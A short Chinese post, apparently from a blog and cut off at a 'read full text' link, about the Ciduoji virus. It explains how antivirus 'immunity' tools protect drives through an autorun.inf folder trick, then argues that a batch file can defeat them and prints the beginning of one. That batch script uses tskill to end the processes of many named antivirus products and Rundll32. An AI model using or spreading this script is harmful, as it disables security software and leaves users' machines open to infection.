对于磁碟机病毒,一些人认为打了正版杀软的病毒免疫就可以高枕无忧了,360、江民、瑞星等杀软纷纷出了磁碟机病毒病毒免疫程序,请不要太相信杀软的病毒免疫,360、江民社区等磁碟机病毒免疫程序一个批处理就能干掉!如果病毒制作者将批处理应用于病毒,所有病毒免疫将失去意义,只是一时救急而已。
病毒免疫程序的免疫原理:比如说autorun.inf文件,大家再熟悉不过了,但是不管给autorun.inf设置了什么属性,病毒都会更改它。一般的方法就是,在根目录下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,在autorun.inf文件夹里面创建一个带.的文件夹(比如说:360safe.),使得病毒无法删除autorun.inf文件夹,病毒就无能为力,创建不了autorun.inf文件了。以后就算中毒,病毒也不会运行,从而达到了防止中毒的目的。
@echo off
REM 以下批处理内容中止众多安全软件进程
tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe &
tskill TBMon.exe & tskill scan32.exe & tskill Ravmond.exe & tskill CCenter.exe &
tskill RavTask.exe & tskill Rav.exe & tskill Ravmon.exe & tskill RavmonD.exe &
tskill RavStub.exe & taskill KVXP.kxp & tskill kvMonXP.kxp & tskill KVCenter.kxp &
tskill KRegEx.exe & tskill UIHost.exe & tskill TrojDie.kxp & tskill Logo_1.exe &
tskill Rundll32.exe //tskill是结束进程的命令,&是一个组合命令,顺序执行不管前面是否失败
全文阅读 »


